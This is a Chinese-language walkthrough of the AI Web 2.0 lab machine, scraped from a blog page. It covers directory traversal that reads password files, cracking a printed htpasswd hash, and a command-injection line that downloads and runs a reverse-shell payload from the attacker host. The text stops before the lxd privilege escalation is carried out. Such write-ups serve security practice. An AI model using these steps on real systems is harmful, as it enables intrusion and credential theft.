kali: 192.168.0.103

目标机:192.168.0.105

0X01 扫描端口和目录

a)扫描端口

开启了80和22端口


b)扫描目录

看到两个敏感字样的目录

尝试访问/webadmin 目录,没有账号密码进不去

另一个也被禁止访问

c)深度扫描目录

dirb http://192.168.0.105 -X .txt,.html,.php,.zip

看到有个download文件,但是下载后是个空文件

0X02 查看80端口的网页结构,获取有效信息

是一个不需要密码的登陆界面,尝试admin登陆没用,注册一个账号登陆进去

暴露了这是一个文件共享的系统

Google搜索此系统

得到两个漏洞

一个目录遍历

一个跨站请求伪造


0X03 使用目录遍历

有两个文件可以目录遍历,尝试任选一个包含passwd文件成功


0X04 爆破ssh

通过passwd我们可以看到用户名是aiweb2

尝试进行爆破ssh登陆

并没有获得密码

0X05 查看配置文件和日志文件,尝试包含日志

得到一个apache配置文件,没得到什么信息

读取apache和ssh日志,都失败,可能没有权限读取

后来查看别人的文章才知道,思路是对的,但是文件没找到,读取/etc/apache2/.htpasswd文件,为什么会想到查看这个文件,后面我理解了,因为之前我们扫到了webadmin的目录,网站后台登陆

读取/etc/apache2/.htpasswd文件得到一串密码aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/

使用john破解hash,将密码粘贴到test.txt中

john --wordlist='/usr/share/wordlists/rockyou.txt' test.txt john --show test.txt

rockyou.txt是收集的已泄露密码文件


0X06 进入网站后台

暗示我们查看robots文件

查看两个目录,第一个是ping命令,联想到命令执行漏洞

第二个目录,翻译:在此目录中找到多汁的信息!!!

使用dirb 搜索目录,什么也没找到

0X07 利用第一个目录

a)查看是否有命令执行漏洞


b)命令执行漏洞存在,使用漏洞获得shell

使用命令执行下载大马上去,密码正确进不去

下载msf生成的php文件,访问上线后立马挂掉

写了个一句话木马进去,也连不上,也不知道为什么

最后用msf的linux/x86/meterpreter/reverse_tcp这个payload反弹成功,制作过程不演示,

|| wget http://192.168.0.103/shell || chmod +x shell || ./shell


0X08 提权

a) 查看当前网站目录下是否还有遗漏的重要信息

在另一个目录下发现隐藏文件,查看内容记录着ssh的账号密码


b) 登陆ssh

uname -an 查看内核信息 不优先使用内核提权

id 查看当前用户权限 发现lxd

LXD:Linux的下一代容器管理器

谷歌搜索相关漏洞: lxd exploit

查到一条相关漏洞,版本要求Ubuntu18.04

cat /etc/issue

查看当前版本,可以利用

下载exp并查看是使用说明

AI Web 2.0的更多相关文章

  1. AI Web 1.0

    kali:192.168.0.103 目标机:192.168.0.105 0X01 端口和目录扫描 打开目标主页没有任何信息 a) 端口扫描 只有一个80端口开启 b) 目录扫描 0x03 查看敏感目 ...

  2. AI:WEB:1 Walkthrough

    AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法:    Nmap网络扫描    浏 ...

  3. 语义网 (Semantic Web)和 web 3.0

    语义网=有意义的网络. "如果说 HTML 和 WEB 将整个在线文档变成了一本巨大的书,那么 RDF, schema, 和 inference languages 将会使世界上所有的数据变 ...

  4. 说说web 2.0生态圈的那些事

    先来说一道面试题吧,“说一下,web 2.0 和web 1.0的区别?” 官方的解释是这样的: Web1.0 的主要特点在于用户通过浏览器获取信息,Web2.0 则更注重用户的交互作用,用户既是网站内 ...

  5. 基于Server-Sent Event的简单聊天室 Web 2.0时代,即时通信已经成为必不可少的网站功能,那实现Web即时通信的机制有哪些呢?在这门项目课中我们将一一介绍。最后我们将会实现一个基于Server-Sent Event和Flask简单的在线聊天室。

    基于Server-Sent Event的简单聊天室 Web 2.0时代,即时通信已经成为必不可少的网站功能,那实现Web即时通信的机制有哪些呢?在这门项目课中我们将一一介绍.最后我们将会实现一个基于S ...

  6. asp.net web api2.0 ajax跨域解决方案

    asp.net web api2.0 ajax跨域解决方案 Web Api的优缺点就不说了,直接说怎么跨域,我搜了一下,主要是有两种.  一,ASP.NET Web API支持JSONP,分两种 1, ...

  7. 关于web.xml3.0启动报错

    九月 08, 2017 10:18:19 上午 org.apache.tomcat.util.digester.SetPropertiesRule begin 警告: [SetPropertiesRu ...

  8. O'Reilly总裁提姆-奥莱理:什么是Web 2.0

    O'Reilly总裁提姆-奥莱理:什么是Web 2.0 译者序:Web 2.0这一概念,由O'Reilly媒体公司总裁兼CEO提姆·奥莱理提出.他是美国IT业界公认的传奇式人物,是“开放源码”概念的缔 ...

  9. Web 2.0应用客户端性能问题十大根源《转载》

    前言 Web 2.0应用的推广为用户带来了全新的体验,同时也让开发人员更加关注客户端性能问题.最近,资深Web性能诊断专家.知名工具dynatrace的创始人之一Andreas Grabner根据自己 ...

随机推荐

  1. GPU与CPU

    GPU与CPU CPU CPU,也就是中央处理器,结构主要包括控制器(指挥各部分工作).运算器(实现数据加工).寄存器.高缓以及数据/控制/状态总线.计算机的性能很大程度上依赖于CPU,CPU的功能包 ...

  2. node--->PHPStorm 停留在 Scanning files to index..

    使用webpack时,敲了npm 一些命令后,PHPStorm 开始 Scanning files to index...,去建立文件索引,但是如果一直停留在这个状态,说明是npm install 后 ...

  3. Git详解之基础使用

    前言 读完本章你就能上手使用 Git 了.本章将介绍几个最基本的,也是最常用的 Git 命令,以后绝大多数时间里用到的也就是这几个命令.读完本章,你就能初始化一个新的代码仓库,做一些适当配置:开始或停 ...

  4. java编写杨辉三角

    import java.util.Scanner; /* *计算杨辉三角: * 规律:两边都是1 * 从第三行开始,上一行的前一个元素+与其并排的元素等于下面的元素 * 例如: * 1 * 11 * ...

  5. Linux后门的几种姿势

    转载自 https://evilanne.github.io/2017/08/26/Linux%E5%90%8E%E9%97%A8-%E6%8C%81%E7%BB%AD%E5%85%B3%E6%B3% ...

  6. Linux磁盘管理及挂载

    1.在vm workstations添加磁盘 添加完之后重启一下虚拟机 然后fdisk -l 可以看到虚拟机已经识别到了新的磁盘 2.添加磁盘分区 输入命令 fdisk /dev/sdb 命令(输入 ...

  7. selenium控制浏览器操作

    selenium控制浏览器操作 控制浏览器有哪些操作? 控制页面大小 前进.后退 刷新 自动输入.提交 ........  控制页面大小,实例: # -*- coding:utf-8 -*- from ...

  8. Tomcat安装教程及常见错误解决方法

    目录 Tomcat安装教程及常见错误解决方法 一.安装前准备 ·熟悉自己电脑的操作系统版本(32位or64位) ·保证电脑上已经装好JDK,并且已经设置好环境变量. 二.Tomcat安装教程(以Tom ...

  9. Django 搭建

    1.安装python 2.pip 安装 Django  2.1.3 是版本号 命令:pip install Django==2.1.3 3.数据库驱动: mysql 数据库配置文档: 下载 whl 文 ...

  10. NR / 5G - Uplink Carrier Waveform Generation